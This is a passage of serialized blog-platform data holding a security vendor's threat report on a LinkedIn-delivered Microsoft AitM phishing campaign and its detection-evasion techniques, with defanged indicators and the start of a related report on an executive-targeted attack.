61,"marks":38462,"value":28494,"nodeType":864},{},[],{"data":38464,"content":38467,"nodeType":996},{"target":38465},{"sys":38466},{"id":28499,"type":1001,"linkType":1002},[],{"data":38469,"content":38472,"nodeType":996},{"target":38470},{"sys":38471},{"id":28505,"type":1001,"linkType":1002},[],{"data":38474,"content":38477,"nodeType":996},{"target":38475},{"sys":38476},{"id":28511,"type":1001,"linkType":1002},[],{"data":38479,"content":38482,"nodeType":996},{"target":38480},{"sys":38481},{"id":28517,"type":1001,"linkType":1002},[],{"data":38484,"content":38487,"nodeType":996},{"target":38485},{"sys":38486},{"id":28523,"type":1001,"linkType":1002},[],{"data":38489,"content":38490,"nodeType":1005},{},[],{"data":38492,"content":38493,"nodeType":1009},{},[38494],{"data":38495,"marks":38496,"value":28535,"nodeType":864},{},[38497],{"type":899},{"data":38499,"content":38500,"nodeType":860},{},[38501],{"data":38502,"marks":38503,"value":28542,"nodeType":864},{},[],{"data":38505,"content":38506,"nodeType":860},{},[38507],{"data":38508,"marks":38509,"value":28549,"nodeType":864},{},[],{"data":38511,"content":38512,"nodeType":860},{},[38513],{"data":38514,"marks":38515,"value":28556,"nodeType":864},{},[],{"data":38517,"content":38518,"nodeType":860},{},[38519],{"data":38520,"marks":38521,"value":28564,"nodeType":864},{},[38522],{"type":899},{"data":38524,"content":38527,"nodeType":996},{"target":38525},{"sys":38526},{"id":28569,"type":1001,"linkType":1002},[],{"data":38529,"content":38530,"nodeType":860},{},[38531,38534,38541],{"data":38532,"marks":38533,"value":28577,"nodeType":864},{},[],{"data":38535,"content":38536,"nodeType":883},{"uri":13019},[38537],{"data":38538,"marks":38539,"value":315,"nodeType":864},{},[38540],{"type":1455},{"data":38542,"marks":38543,"value":28588,"nodeType":864},{},[],{"data":38545,"content":38546,"nodeType":860},{},[38547],{"data":38548,"marks":38549,"value":28595,"nodeType":864},{},[],{"data":38551,"content":38552,"nodeType":860},{},[38553,38556,38563],{"data":38554,"marks":38555,"value":28602,"nodeType":864},{},[],{"data":38557,"content":38558,"nodeType":883},{"uri":6237},[38559],{"data":38560,"marks":38561,"value":6242,"nodeType":864},{},[38562],{"type":1455},{"data":38564,"marks":38565,"value":28160,"nodeType":864},{},[],{"data":38567,"content":38570,"nodeType":996},{"target":38568},{"sys":38569},{"id":27224,"type":1001,"linkType":1002},[],{"data":38572,"content":38573,"nodeType":1005},{},[],{"data":38575,"content":38576,"nodeType":1009},{},[38577],{"data":38578,"marks":38579,"value":5571,"nodeType":864},{},[38580],{"type":899},{"data":38582,"content":38583,"nodeType":860},{},[38584],{"data":38585,"marks":38586,"value":28634,"nodeType":864},{},[],{"data":38588,"content":38589,"nodeType":941},{},[38590,38599,38608,38617,38626,38635,38644],{"data":38591,"content":38592,"nodeType":945},{},[38593],{"data":38594,"content":38595,"nodeType":860},{},[38596],{"data":38597,"marks":38598,"value":28647,"nodeType":864},{},[],{"data":38600,"content":38601,"nodeType":945},{},[38602],{"data":38603,"content":38604,"nodeType":860},{},[38605],{"data":38606,"marks":38607,"value":28657,"nodeType":864},{},[],{"data":38609,"content":38610,"nodeType":945},{},[38611],{"data":38612,"content":38613,"nodeType":860},{},[38614],{"data":38615,"marks":38616,"value":28667,"nodeType":864},{},[],{"data":38618,"content":38619,"nodeType":945},{},[38620],{"data":38621,"content":38622,"nodeType":860},{},[38623],{"data":38624,"marks":38625,"value":28677,"nodeType":864},{},[],{"data":38627,"content":38628,"nodeType":945},{},[38629],{"data":38630,"content":38631,"nodeType":860},{},[38632],{"data":38633,"marks":38634,"value":28687,"nodeType":864},{},[],{"data":38636,"content":38637,"nodeType":945},{},[38638],{"data":38639,"content":38640,"nodeType":860},{},[38641],{"data":38642,"marks":38643,"value":28697,"nodeType":864},{},[],{"data":38645,"content":38646,"nodeType":945},{},[38647],{"data":38648,"content":38649,"nodeType":860},{},[38650],{"data":38651,"marks":38652,"value":28707,"nodeType":864},{},[],{"data":38654,"content":38655,"nodeType":860},{},[38656],{"data":38657,"marks":38658,"value":28714,"nodeType":864},{},[],{"data":38660,"content":38661,"nodeType":1005},{},[],{"data":38663,"content":38664,"nodeType":1009},{},[38665],{"data":38666,"marks":38667,"value":21018,"nodeType":864},{},[38668],{"type":899},{"data":38670,"content":38671,"nodeType":860},{},[38672],{"data":38673,"marks":38674,"value":28731,"nodeType":864},{},[],{"data":38676,"content":38677,"nodeType":860},{},[38678],{"data":38679,"marks":38680,"value":28738,"nodeType":864},{},[],{"data":38682,"content":38683,"nodeType":860},{},[38684],{"data":38685,"marks":38686,"value":21039,"nodeType":864},{},[],{"data":38688,"content":38689,"nodeType":860},{},[38690,38693,38700,38703,38710],{"data":38691,"marks":38692,"value":16314,"nodeType":864},{},[],{"data":38694,"content":38695,"nodeType":883},{"uri":10269},[38696],{"data":38697,"marks":38698,"value":10275,"nodeType":864},{},[38699],{"type":1455},{"data":38701,"marks":38702,"value":19754,"nodeType":864},{},[],{"data":38704,"content":38705,"nodeType":883},{"uri":1700},[38706],{"data":38707,"marks":38708,"value":10299,"nodeType":864},{},[38709],{"type":1455},{"data":38711,"marks":38712,"value":2924,"nodeType":864},{},[],{"data":38714,"content":38717,"nodeType":996},{"target":38715},{"sys":38716},{"id":27224,"type":1001,"linkType":1002},[],{"data":38719,"content":38720,"nodeType":860},{},[38721],{"data":38722,"marks":38723,"value":21,"nodeType":864},{},[],{"items":38725},[38726,38728],{"sys":38727,"name":342},{"id":6596},{"sys":38729,"name":6593},{"id":6592},{"items":38731},[38732],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":38733},{"url":2740},"blog/uncovering-a-calendly-themed-phishing-campaign",{"json":38736},{"data":38737,"content":38738,"nodeType":856},{},[38739],{"data":38740,"content":38741,"nodeType":860},{},[38742],{"data":38743,"marks":38744,"value":38745,"nodeType":864},{},[],"We recently investigated a large-scale phishing campaign that demonstrated a number of advanced detection evasion techniques and social engineering tactics, specifically targeting accounts used to manage business ads. Here’s what you need to know. ",{"id":28798,"publishedAt":38747},"2026-08-12T11:53:32.401Z",{"items":38749},[38750,38752],{"sys":38751,"name":6593},{"id":6592},{"sys":38753,"name":342},{"id":6596},{"items":38755},[38756,38758,38760,38762,38764,38766,38768,38770,38772,38774,38776,38778,38780,38782,38784],{"sys":38757,"name":279,"slug":280,"tier":31},{"id":276},{"sys":38759,"name":413,"slug":414,"tier":31},{"id":410},{"sys":38761,"name":519,"slug":520,"tier":31},{"id":516},{"sys":38763,"name":342,"slug":343,"tier":31},{"id":339},{"sys":38765,"name":642,"slug":643,"tier":31},{"id":639},{"sys":38767,"name":261,"slug":262,"tier":45},{"id":258},{"sys":38769,"name":324,"slug":325,"tier":45},{"id":321},{"sys":38771,"name":466,"slug":467,"tier":45},{"id":463},{"sys":38773,"name":571,"slug":572,"tier":45},{"id":568},{"sys":38775,"name":511,"slug":512,"tier":45},{"id":508},{"sys":38777,"name":607,"slug":608,"tier":45},{"id":604},{"sys":38779,"name":440,"slug":441,"tier":45},{"id":437},{"sys":38781,"name":431,"slug":432,"tier":45},{"id":428},{"sys":38783,"name":351,"slug":352,"tier":45},{"id":348},{"sys":38785,"name":244,"slug":245,"tier":45},{"id":241},"ch6LxdA9Rhu9m4h0HjFT_SWRyHszoU4PhvUCTXuEhbA",{"id":38788,"title":38789,"authorsCollection":38790,"content":38795,"extension":228,"faqItemsCollection":39324,"faqTitle":59,"featured":6,"hashTags":59,"meta":39326,"metaTitle":39327,"ogImage":59,"postType":5740,"publishedDate":39328,"relatedBlogPostsCollection":39329,"slug":40979,"stem":40980,"subtitle":59,"summary":40981,"synopsis":40992,"sys":40993,"tagsCollection":40996,"topicsCollection":41002,"__hash__":41026},"blog/blog/new-phishing-campaign-identified-targeting-linkedin-users.json","New phishing campaign identified targeting LinkedIn users",{"items":38791},[38792],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":38793,"profilePicture":38794},[18135],{"url":2740},{"json":38796,"links":39226},{"data":38797,"content":38798,"nodeType":856},{},[38799,38816,38832,38838,38845,38852,38855,38863,38881,38888,38894,38901,38907,38914,38920,38927,38933,38940,38946,38949,38957,38975,38981,38989,39009,39017,39049,39056,39064,39080,39088,39107,39113,39116,39123,39143,39150,39155,39158,39165,39181,39187,39194,39200],{"data":38800,"content":38801,"nodeType":860},{},[38802,38806,38813],{"data":38803,"marks":38804,"value":38805,"nodeType":864},{},[],"Push recently detected and blocked a high-risk LinkedIn phishing attack that demonstrated a number of crafty (and increasingly common) ",{"data":38807,"content":38808,"nodeType":883},{"uri":7124},[38809],{"data":38810,"marks":38811,"value":13810,"nodeType":864},{},[38812],{"type":1455},{"data":38814,"marks":38815,"value":10094,"nodeType":864},{},[],{"data":38817,"content":38818,"nodeType":860},{},[38819,38823,38828],{"data":38820,"marks":38821,"value":38822,"nodeType":864},{},[],"Phishing via LinkedIn is increasingly common, although it often goes undetected and unreported. This is to be expected when most of the industry’s data on phishing attacks comes from email security vendors and tools. In contrast to email-centric reporting, ",{"data":38824,"marks":38825,"value":38827,"nodeType":864},{},[38826],{"type":899},"34% of the phishing attacks intercepted by Push last month came through non-email channels",{"data":38829,"marks":38830,"value":38831,"nodeType":864},{},[]," like social media, IM platforms, malicious search engine ads, and in-app communications. ",{"data":38833,"content":38837,"nodeType":996},{"target":38834},{"sys":38835},{"id":38836,"type":1001,"linkType":1002},"7i8panfdFUqW9wqYkd9uDc",[],{"data":38839,"content":38840,"nodeType":860},{},[38841],{"data":38842,"marks":38843,"value":38844,"nodeType":864},{},[],"Phishing via LinkedIn is a great way to catch victims unawares and evade traditionally email-based anti-phishing controls. While often used for work and commonly accessed from corporate devices, it sits outside the purview of enterprise security tools, exploiting a visibility and control blind spot. ",{"data":38846,"content":38847,"nodeType":860},{},[38848],{"data":38849,"marks":38850,"value":38851,"nodeType":864},{},[],"Let’s break it down. ",{"data":38853,"content":38854,"nodeType":1005},{},[],{"data":38856,"content":38857,"nodeType":1009},{},[38858],{"data":38859,"marks":38860,"value":38862,"nodeType":864},{},[38861],{"type":899},"Phishing attack breakdown",{"data":38864,"content":38865,"nodeType":860},{},[38866,38870,38878],{"data":38867,"marks":38868,"value":38869,"nodeType":864},{},[],"The victim was sent a malicious link via LinkedIn DM relating to a fake investment opportunity for executives ",{"data":38871,"content":38873,"nodeType":883},{"uri":38872},"https://www.bleepingcomputer.com/news/security/linkedin-phishing-targets-finance-execs-with-fake-board-invites/",[38874],{"data":38875,"marks":38876,"value":38877,"nodeType":864},{},[],"to join the executive board of a newly created \"Common Wealth\" investment fund.",{"data":38879,"marks":38880,"value":1171,"nodeType":864},{},[],{"data":38882,"content":38883,"nodeType":860},{},[38884],{"data":38885,"marks":38886,"value":38887,"nodeType":864},{},[],"After clicking the link, they were redirected three times — via Google Search, and then payrails-canaccord[.]icu/(redacted) — before being sent to a custom landing page hosted on firebasestorage.googleapis[.]com/(redacted). ",{"data":38889,"content":38893,"nodeType":996},{"target":38890},{"sys":38891},{"id":38892,"type":1001,"linkType":1002},"65PeJOKzn6Ba7FDUQRae3Q",[],{"data":38895,"content":38896,"nodeType":860},{},[38897],{"data":38898,"marks":38899,"value":38900,"nodeType":864},{},[],"Upon clicking on one of the document links on the page, the victim is prompted to “view with Microsoft”. ",{"data":38902,"content":38906,"nodeType":996},{"target":38903},{"sys":38904},{"id":38905,"type":1001,"linkType":1002},"4f27KuwTRx1Do59rs3JoVl",[],{"data":38908,"content":38909,"nodeType":860},{},[38910],{"data":38911,"marks":38912,"value":38913,"nodeType":864},{},[],"The user is then met with a Cloudflare Turnstile gate challenge at login.kggpho[.]icu before the page will fully render, and malicious content is loaded. ",{"data":38915,"content":38919,"nodeType":996},{"target":38916},{"sys":38917},{"id":38918,"type":1001,"linkType":1002},"3lpVmLBZSocOSGdlCKhKnD",[],{"data":38921,"content":38922,"nodeType":860},{},[38923],{"data":38924,"marks":38925,"value":38926,"nodeType":864},{},[],"The Microsoft-impersonating AITM phishing page is then served to the victim. Entering credentials and completing the MFA check will result in their Microsoft session being stolen by the attacker. ",{"data":38928,"content":38932,"nodeType":996},{"target":38929},{"sys":38930},{"id":38931,"type":1001,"linkType":1002},"5FCa4EJwyux13K9KBT3nd4",[],{"data":38934,"content":38935,"nodeType":860},{},[38936],{"data":38937,"marks":38938,"value":38939,"nodeType":864},{},[],"You can see the full timeline of events in the Detection Timeline below. ",{"data":38941,"content":38945,"nodeType":996},{"target":38942},{"sys":38943},{"id":38944,"type":1001,"linkType":1002},"8lizkPJcGdZhtWFV2QEwQ",[],{"data":38947,"content":38948,"nodeType":1005},{},[],{"data":38950,"content":38951,"nodeType":1009},{},[38952],{"data":38953,"marks":38954,"value":38956,"nodeType":864},{},[38955],{"type":899},"Detection evasion techniques observed",{"data":38958,"content":38959,"nodeType":860},{},[38960,38964,38971],{"data":38961,"marks":38962,"value":38963,"nodeType":864},{},[],"The attacker used a number of ",{"data":38965,"content":38966,"nodeType":883},{"uri":7124},[38967],{"data":38968,"marks":38969,"value":13810,"nodeType":864},{},[38970],{"type":1455},{"data":38972,"marks":38973,"value":38974,"nodeType":864},{},[]," to prevent the phishing site being analysed and detected by security tools. ",{"data":38976,"content":38980,"nodeType":996},{"target":38977},{"sys":38978},{"id":38979,"type":1001,"linkType":1002},"7q9D1MREwTCCpnjvZZ5wk1",[],{"data":38982,"content":38983,"nodeType":1312},{},[38984],{"data":38985,"marks":38986,"value":38988,"nodeType":864},{},[38987],{"type":899},"LinkedIn delivery",{"data":38990,"content":38991,"nodeType":860},{},[38992,38996,39005],{"data":38993,"marks":38994,"value":38995,"nodeType":864},{},[],"As we mentioned above, sending phishing lures via ",{"data":38997,"content":38999,"nodeType":883},{"uri":38998},"https://phishing-techniques.pushsecurity.com/techniques/social-media/",[39000],{"data":39001,"marks":39002,"value":39004,"nodeType":864},{},[39003],{"type":1455},"social media apps",{"data":39006,"marks":39007,"value":39008,"nodeType":864},{},[]," like LinkedIn is a great way to reach employees in a place that they expect to be contacted by people outside of their organization. By evading the traditional phishing control point altogether (email) attackers significantly reduce the risk of interception. ",{"data":39010,"content":39011,"nodeType":1312},{},[39012],{"data":39013,"marks":39014,"value":39016,"nodeType":864},{},[39015],{"type":899},"Lengthy redirect chain through trusted sites",{"data":39018,"content":39019,"nodeType":860},{},[39020,39024,39032,39036,39045],{"data":39021,"marks":39022,"value":39023,"nodeType":864},{},[],"Attackers use ",{"data":39025,"content":39026,"nodeType":883},{"uri":7248},[39027],{"data":39028,"marks":39029,"value":39031,"nodeType":864},{},[39030],{"type":1455},"lengthy redirect chains",{"data":39033,"marks":39034,"value":39035,"nodeType":864},{},[]," in combination with hosting pages on ",{"data":39037,"content":39039,"nodeType":883},{"uri":39038},"https://phishing-techniques.pushsecurity.com/techniques/trusted-website-hosting/",[39040],{"data":39041,"marks":39042,"value":39044,"nodeType":864},{},[39043],{"type":1455},"legitimate, trusted sites",{"data":39046,"marks":39047,"value":39048,"nodeType":864},{},[]," (in this case Firebase, Google’s app development platform). This is a technique we see a lot, with various Google and Microsoft sites cropping up time and again, including Google Forms, Google Sites, Google Script, Google AMP, Microsoft Dynamics, SharePoint, Azure Front Door, and many more, all used by attackers as part of their phishing attacks. ",{"data":39050,"content":39051,"nodeType":860},{},[39052],{"data":39053,"marks":39054,"value":39055,"nodeType":864},{},[],"Legitimate services are less likely to be flagged by link analysis tools and effectively cloak the initial URL delivered to the victim to increase the chance of successful delivery of and access to the link, while many services are excluded from page scanning tools owing to their association with trusted domains. ",{"data":39057,"content":39058,"nodeType":1312},{},[39059],{"data":39060,"marks":39061,"value":39063,"nodeType":864},{},[39062],{"type":899},"Bot protection",{"data":39065,"content":39066,"nodeType":860},{},[39067,39070,39077],{"data":39068,"marks":39069,"value":35534,"nodeType":864},{},[],{"data":39071,"content":39072,"nodeType":883},{"uri":35537},[39073],{"data":39074,"marks":39075,"value":35543,"nodeType":864},{},[39076],{"type":1455},{"data":39078,"marks":39079,"value":35547,"nodeType":864},{},[],{"data":39081,"content":39082,"nodeType":1312},{},[39083],{"data":39084,"marks":39085,"value":39087,"nodeType":864},{},[39086],{"type":899},"Page obfuscation",{"data":39089,"content":39090,"nodeType":860},{},[39091,39095,39103],{"data":39092,"marks":39093,"value":39094,"nodeType":864},{},[],"Phishing pages ",{"data":39096,"content":39097,"nodeType":883},{"uri":35636},[39098],{"data":39099,"marks":39100,"value":39102,"nodeType":864},{},[39101],{"type":1455},"change and even randomize elements of the page",{"data":39104,"marks":39105,"value":39106,"nodeType":864},{},[]," to avoid static fingerprints and defeat comparison-based checks against real pages. This includes the page title, text, images, backgrounds, logos, favicons, etc. — all of which may be signatured components using web page analysis tools. These elements can even be embedded in an encoded form so it isn’t present in the initial HTML, and is instead dynamically set at runtime when loaded. As an example, you can see that the page randomly generated the tab header text.",{"data":39108,"content":39112,"nodeType":996},{"target":39109},{"sys":39110},{"id":39111,"type":1001,"linkType":1002},"2bbOZC9M4y69ACDy7bn209",[],{"data":39114,"content":39115,"nodeType":1005},{},[],{"data":39117,"content":39118,"nodeType":1009},{},[39119],{"data":39120,"marks":39121,"value":7114,"nodeType":864},{},[39122],{"type":899},{"data":39124,"content":39125,"nodeType":860},{},[39126,39130,39139],{"data":39127,"marks":39128,"value":39129,"nodeType":864},{},[],"We’re seeing ",{"data":39131,"content":39133,"nodeType":883},{"uri":39132},"https://pushsecurity.com/blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack/",[39134],{"data":39135,"marks":39136,"value":39138,"nodeType":864},{},[39137],{"type":1455},"many phishing campaigns pivoting to social media apps like LinkedIn",{"data":39140,"marks":39141,"value":39142,"nodeType":864},{},[]," and organizations should be on guard against this attack vector, which is highly effective at evading common anti-phishing controls.  ",{"data":39144,"content":39145,"nodeType":860},{},[39146],{"data":39147,"marks":39148,"value":39149,"nodeType":864},{},[],"Just because the attack happens over LinkedIn doesn’t lessen the impact — these are corporate credentials and accounts being targeted, even if it is nominally a “personal” application. Taking over a core identity like a Microsoft or Google account can have wide-ranging consequences, putting data at risk in both core apps and any downstream apps that can be accessed via SSO from the compromised account. ",{"data":39151,"content":39154,"nodeType":996},{"target":39152},{"sys":39153},{"id":27224,"type":1001,"linkType":1002},[],{"data":39156,"content":39157,"nodeType":1005},{},[],{"data":39159,"content":39160,"nodeType":1009},{},[39161],{"data":39162,"marks":39163,"value":21018,"nodeType":864},{},[39164],{"type":899},{"data":39166,"content":39167,"nodeType":860},{},[39168,39171,39178],{"data":39169,"marks":39170,"value":28337,"nodeType":864},{},[],{"data":39172,"content":39173,"nodeType":883},{"uri":7124},[39174],{"data":39175,"marks":39176,"value":28345,"nodeType":864},{},[39177],{"type":1455},{"data":39179,"marks":39180,"value":28349,"nodeType":864},{},[],{"data":39182,"content":39183,"nodeType":860},{},[39184],{"data":39185,"marks":39186,"value":28356,"nodeType":864},{},[],{"data":39188,"content":39189,"nodeType":860},{},[39190],{"data":39191,"marks":39192,"value":39193,"nodeType":864},{},[],"Check out the demo below to see Push detect and block this attack in real-time. ",{"data":39195,"content":39199,"nodeType":996},{"target":39196},{"sys":39197},{"id":39198,"type":1001,"linkType":1002},"5VsFECWlJ1HNGtC0jUcPjH",[],{"data":39201,"content":39202,"nodeType":860},{},[39203,39206,39213,39216,39223],{"data":39204,"marks":39205,"value":16314,"nodeType":864},{},[],{"data":39207,"content":39208,"nodeType":883},{"uri":10269},[39209],{"data":39210,"marks":39211,"value":10275,"nodeType":864},{},[39212],{"type":1455},{"data":39214,"marks":39215,"value":19754,"nodeType":864},{},[],{"data":39217,"content":39218,"nodeType":883},{"uri":1700},[39219],{"data":39220,"marks":39221,"value":10299,"nodeType":864},{},[39222],{"type":1455},{"data":39224,"marks":39225,"value":2924,"nodeType":864},{},[],{"entries":39227},{"hyperlink":39228,"inline":39229,"block":39230},[],[],[39231,39257,39262,39267,39272,39278,39285,39310,39317,39319],{"sys":39232,"__typename":1740,"content":39233,"name":39256,"title":59},{"id":38836},{"json":39234},{"nodeType":856,"data":39235,"content":39236},{},[39237],{"nodeType":860,"data":39238,"content":39239},{},[39240,39244,39252],{"nodeType":864,"value":39241,"marks":39242,"data":39243},"This is the second blog post we’ve released on LinkedIn-based phishing attacks — ",[],{},{"nodeType":883,"data":39245,"content":39246},{"uri":39132},[39247],{"nodeType":864,"value":39248,"marks":39249,"data":39251},"read our last report",[39250],{"type":1455},{},{"nodeType":864,"value":39253,"marks":39254,"data":39255}," to learn about a sophisticated spear-phishing campaign targeting tech company executives.",[],{},"Phishing blog post insight box 2",{"sys":39258,"__typename":1724,"title":39259,"caption":39259,"layoutMode":59,"file":39260},{"id":38892},"Custom landing page hosted on Firebase.",{"url":39261,"width":1736,"height":30057},"https://images.ctfassets.net/y1cdw1ablpvd/5gjDDExYBbCZOIH4FcSONO/0bfd1bddd13fd5096f0a60b690803930/image4.png",{"sys":39263,"__typename":1724,"title":39264,"caption":39264,"layoutMode":59,"file":39265},{"id":38905},"The victim is prompted to click the link to “view with Microsoft”. ",{"url":39266,"width":1736,"height":30057},"https://images.ctfassets.net/y1cdw1ablpvd/6Wm1lVmjX8WyLHmTP4sEpV/49b6d013ccde770b1b467dc16da01d45/image3.png",{"sys":39268,"__typename":1724,"title":39269,"caption":39269,"layoutMode":59,"file":39270},{"id":38918},"The phishing page is protected by Cloudflare Turnstile.",{"url":39271,"width":1736,"height":30057},"https://images.ctfassets.net/y1cdw1ablpvd/4nxdRlox0ZOAqd3YWaIerI/245ffaec121d59d565aa4c6f073e590a/image2.png",{"sys":39273,"__typename":1724,"title":39274,"caption":39274,"layoutMode":59,"file":39275},{"id":38931},"AITM phishing page impersonating Microsoft.",{"url":39276,"width":1736,"height":39277},"https://images.ctfassets.net/y1cdw1ablpvd/2aLY3it2x1Vslss8uCDsOz/9f93644ece3f88fc3b8cd118c906257c/image6.png",1085,{"sys":39279,"__typename":1724,"title":39280,"caption":39280,"layoutMode":59,"file":39281},{"id":38944},"Detection Timeline provided by the Push platform.",{"url":39282,"width":39283,"height":39284},"https://images.ctfassets.net/y1cdw1ablpvd/2iD9HLNz1sLjMeXVm4BoWU/0072a2ad90de59cd5e2a373905be67e2/Frame_627987.png",908,788,{"sys":39286,"__typename":1740,"content":39287,"name":39309,"title":59},{"id":38979},{"json":39288},{"nodeType":856,"data":39289,"content":39290},{},[39291],{"nodeType":860,"data":39292,"content":39293},{},[39294,39298,39306],{"nodeType":864,"value":39295,"marks":39296,"data":39297},"Learn more about phishing detection evasion techniques in our recent whitepaper: ",[],{},{"nodeType":883,"data":39299,"content":39301},{"uri":39300},"https://pushsecurity.com/resources/phishing-evolution",[39302],{"nodeType":864,"value":39303,"marks":39304,"data":39305},"The Evolution of Phishing Attacks",[],{},{"nodeType":864,"value":2924,"marks":39307,"data":39308},[],{},"LinkedIn Phishing p2: Insight box 1",{"sys":39311,"__typename":1724,"title":39312,"caption":39312,"layoutMode":59,"file":39313},{"id":39111},"Randomly generated tab header text.",{"url":39314,"width":39315,"height":39316},"https://images.ctfassets.net/y1cdw1ablpvd/28EfPHtOCKnnIBLtAuHjDH/a441a96b328ed6228e096542a44092a8/image1.png",1430,208,{"sys":39318,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"sys":39320,"__typename":18759,"title":39321,"arcadeDemoUrl":39322,"playText":39323},{"id":39198},"LinkedIn Phishing Attack Stopped By Push","https://demo.arcade.software/C99MO1d824gs5anTRyIJ?embed","1 mins",{"items":39325},[],{},"New LinkedIn phishing campaign identified by Push Security","2025-10-30T00:00:00.000Z",{"items":39330},[39331,39884,40371],{"__typename":2059,"sys":39332,"content":39334,"title":39870,"synopsis":39871,"hashTags":59,"publishedDate":39872,"slug":39873,"tagsCollection":39874,"authorsCollection":39880},{"id":39333},"2yEhB2gFC2TJDLquVP3cg2",{"json":39335},{"data":39336,"content":39337,"nodeType":856},{},[39338,39344,39351,39358,39365,39368,39375,39382,39402,39408,39415,39421,39428,39435,39441,39457,39463,39470,39476,39479,39487,39494,39502,39521,39528,39535,39543,39562,39570,39589,39597,39616,39621,39624,39632,39639,39682,39689,39696,39699,39706,39713,39757,39760,39767,39774,39819,39846,39853],{"data":39339,"content":39343,"nodeType":996},{"target":39340},{"sys":39341},{"id":39342,"type":1001,"linkType":1002},"2pi21QGUvtdsDTbZYIF5Pr",[],{"data":39345,"content":39346,"nodeType":860},{},[39347],{"data":39348,"marks":39349,"value":39350,"nodeType":864},{},[],"Push recently detected and blocked a high-risk phishing attack targeting a company executive's Google Workspace account. ",{"data":39352,"content":39353,"nodeType":860},{},[39354],{"data":39355,"marks":39356,"value":39357,"nodeType":864},{},[],"This attack demonstrated a range of advanced detection evasion techniques designed to circumvent traditional detection controls. ",{"data":39359,"content":39360,"nodeType":860},{},[39361],{"data":39362,"marks":39363,"value":39364,"nodeType":864},{},[],"Given this was a highly targeted attack against a company executive, the impact of a successful phish would have been extremely high. Push’s browser-based detection and response solution intercepted and blocked the phish in real-time, preventing the Microsoft session or credentials being captured by the attacker.",{"data":39366,"content":39367,"nodeType":1005},{},[],{"data":39369,"content":39370,"nodeType":1009},{},[39371],{"data":39372,"marks":39373,"value":5002,"nodeType":864},{},[39374],{"type":899},{"data":39376,"content":39377,"nodeType":860},{},[39378],{"data":39379,"marks":39380,"value":39381,"nodeType":864},{},[],"A Push customer’s exec was targeted on LinkedIn via a direct message from another exec about an investment opportunity. The sender’s account had been compromised and used to approach high-value targets. ",{"data":39383,"content":39384,"nodeType":860},{},[39385,39389,39398],{"data":39386,"marks":39387,"value":39388,"nodeType":864},{},[],"The victim was sent a link to a basic page hosted on ",{"data":39390,"content":39392,"nodeType":883},{"uri":39391},"http://sites.google.com",[39393],{"data":39394,"marks":39395,"value":39397,"nodeType":864},{},[39396],{"type":1455},"sites.google.com",{"data":39399,"marks":39400,"value":39401,"nodeType":864},{},[],", styled as a landing page for a private equity fund investment opportunity. The page had buttons to handle both Microsoft and Google users. ",{"data":39403,"content":39407,"nodeType":996},{"target":39404},{"sys":39405},{"id":39406,"type":1001,"linkType":1002},"1cEvEzLdKIuj6zuGn9aWJB",[],{"data":39409,"content":39410,"nodeType":860},{},[39411],{"data":39412,"marks":39413,"value":39414,"nodeType":864},{},[],"Upon clicking a button, Google Search was used as a redirect before taking the victim to a second page hosted on Microsoft Dynamics. This page was styled to look like Google Drive, where the victim was prompted to enter their last name and email into the form. ",{"data":39416,"content":39420,"nodeType":996},{"target":39417},{"sys":39418},{"id":39419,"type":1001,"linkType":1002},"4fJ3JUdGcuRTa2Nza9QhkU",[],{"data":39422,"content":39423,"nodeType":860},{},[39424],{"data":39425,"marks":39426,"value":39427,"nodeType":864},{},[],"Upon entering their details and clicking submit, the victim was finally sent to an  Attacker-in-the-Middle (AitM) phishing page. ",{"data":39429,"content":39430,"nodeType":860},{},[39431],{"data":39432,"marks":39433,"value":39434,"nodeType":864},{},[],"To access the page, the victim had to solve a custom CAPTCHA challenge, which we’ve observed in a number of recent phishing attacks that we’ve linked to the Tycoon 2FA phishing kit.  ",{"data":39436,"content":39440,"nodeType":996},{"target":39437},{"sys":39438},{"id":39439,"type":1001,"linkType":1002},"4Yu36QHTzSBZSg00QpbD1o",[],{"data":39442,"content":39443,"nodeType":860},{},[39444,39448,39453],{"data":39445,"marks":39446,"value":39447,"nodeType":864},{},[],"Because the customer had configured Push’s ",{"data":39449,"marks":39450,"value":39452,"nodeType":864},{},[39451],{"type":899},"phishing tool detection control",{"data":39454,"marks":39455,"value":39456,"nodeType":864},{},[]," in block mode, the Push browser agent flagged the page as malicious to the user and prevented the attack from continuing. ",{"data":39458,"content":39462,"nodeType":996},{"target":39459},{"sys":39460},{"id":39461,"type":1001,"linkType":1002},"6LfBXkDKqh1ogCMxaxyV6x",[],{"data":39464,"content":39465,"nodeType":860},{},[39466],{"data":39467,"marks":39468,"value":39469,"nodeType":864},{},[],"This detection was hooked by the customer’s security lake to trigger their security incident response workflow for further investigation. Push’s timelines feature ensured that the full chain of URLs accessed and actions performed on different pages could be analyzed by the security team. ",{"data":39471,"content":39475,"nodeType":996},{"target":39472},{"sys":39473},{"id":39474,"type":1001,"linkType":1002},"4S8J7zmi6Q5wOt9vQHUe6l",[],{"data":39477,"content":39478,"nodeType":1005},{},[],{"data":39480,"content":39481,"nodeType":1009},{},[39482],{"data":39483,"marks":39484,"value":39486,"nodeType":864},{},[39485],{"type":899},"Notable techniques",{"data":39488,"content":39489,"nodeType":860},{},[39490],{"data":39491,"marks":39492,"value":39493,"nodeType":864},{},[],"This attack featured a number of notable attacker techniques designed to evade common phishing detection controls. ",{"data":39495,"content":39496,"nodeType":1312},{},[39497],{"data":39498,"marks":39499,"value":39501,"nodeType":864},{},[39500],{"type":899},"Delivering the phishing lure via LinkedIn",{"data":39503,"content":39504,"nodeType":860},{},[39505,39509,39517],{"data":39506,"marks":39507,"value":39508,"nodeType":864},{},[],"Using ",{"data":39510,"content":39511,"nodeType":883},{"uri":38998},[39512],{"data":39513,"marks":39514,"value":39516,"nodeType":864},{},[39515],{"type":1455},"social media sites like LinkedIn",{"data":39518,"marks":39519,"value":39520,"nodeType":864},{},[]," to deliver a phishing message has a number of advantages for the attacker. Generally, users are less alert to phishing attempts on social platforms, particularly those like LinkedIn which are used for personal as well as work purposes. ",{"data":39522,"content":39523,"nodeType":860},{},[39524],{"data":39525,"marks":39526,"value":39527,"nodeType":864},{},[],"However, the primary benefit of delivering phishing over LinkedIn is to evade email-based detection controls. With modern email security tools conducting various stages of analysis, such as analysing the URL, attempting to inspect the page in a web sandbox, and analyzing the written content of an email for possible malicious intent, it can be easier for attackers to simply bypass email altogether. 